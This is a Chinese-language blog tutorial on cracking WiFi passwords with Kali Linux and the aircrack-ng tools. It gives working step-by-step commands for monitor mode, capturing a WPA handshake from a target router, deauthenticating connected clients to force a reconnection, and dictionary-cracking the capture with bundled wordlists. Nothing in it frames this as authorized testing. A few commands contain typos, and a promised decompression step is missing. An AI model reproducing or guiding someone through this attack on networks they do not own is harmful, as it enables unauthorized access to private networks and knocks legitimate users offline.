破解WIFI教程
- 2020 年 3 月 28 日
- 筆記
今日主題:如何破解WIFI
準備工具
- 筆記型電腦一台
- usb無線網卡【我用的是小米的】
- kali系統【可以在虛擬機里裝,建議用2019年及以下版本】
VMware Workstation15虛擬機安裝
可以參考https://www.jianshu.com/p/552179808ebf
kali安裝
可以參考https://www.cnblogs.com/changjue/p/11244585.html
WIFI加密方式
1. WEP(有線等效加密)——採用WEP64位或者128位數據加密。
2.WPA-PSK[TKIP]———採用預共享秘鑰的WI-FI保護訪問,採用WPA-PSK標準加密技術,加密類型為TKIP。
3.WPA-PSK[TKIP]+WPA2-PSK[AES]———允許客戶端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。
一
打開虛擬機
,插入usb網卡
,把網卡
放到虛擬機
來
桌面右鍵
,選擇Open in Terminal
打開終端
二
顯示網卡資訊
airmon-ng
開啟網卡監控
airmon-ng start wlan0
用ifconfig命令查看一下網卡資訊
ifconfig
可以看到網卡的名字已經變了
三
掃描WIFI訊號
airodump-ng wlan0mon
拿到握手包
airodump-ng -w freedom -c 11 -–bssid 44:97:5A:F2:9E:B0 wlan0mon --ignore-negative-one
解釋:
-c:指定信道[ch]
-w:指定抓去握手包的存放位置或者名字,freedom是一會抓去的握手包的名字
--bssid:指定路由器的MAC
再開一個終端輸入命令
aireplay-ng -0 10 -a 路由器MAC -c 客戶機MAC wlan0mon – -ignore-negative-one
使用airplay-ng工具強制斷開已經連接到wifi的設備重新連接路由器,來進行抓去數據包
解釋:
-0:指定發送反認證包的個數(阿利伯數字0)
-a:指定路由器的MAC
-c:指定客戶機的MAC
出現下圖就是抓取成功
破解握手包
aircrack-ng -w dict freedom-*.cap
dict:字典的名字
freedom-*.cap:握手包
破解成功
補充
- 系統自帶了密碼字典,我用的是我自己的
字典位置如下:
/usr/share/john/password.lst /usr/share/wfuzz/wordlist /usr/share/ wordlists/rockyou.txt
最後一個路徑下的文件默認是壓縮的,可以通過以下命令解壓
-
反向認證的原理是讓其中一個客戶端下線,然後他再次連接,就可以獲取握手包
-
訊號掃描結束或者進程終止:ctrl+c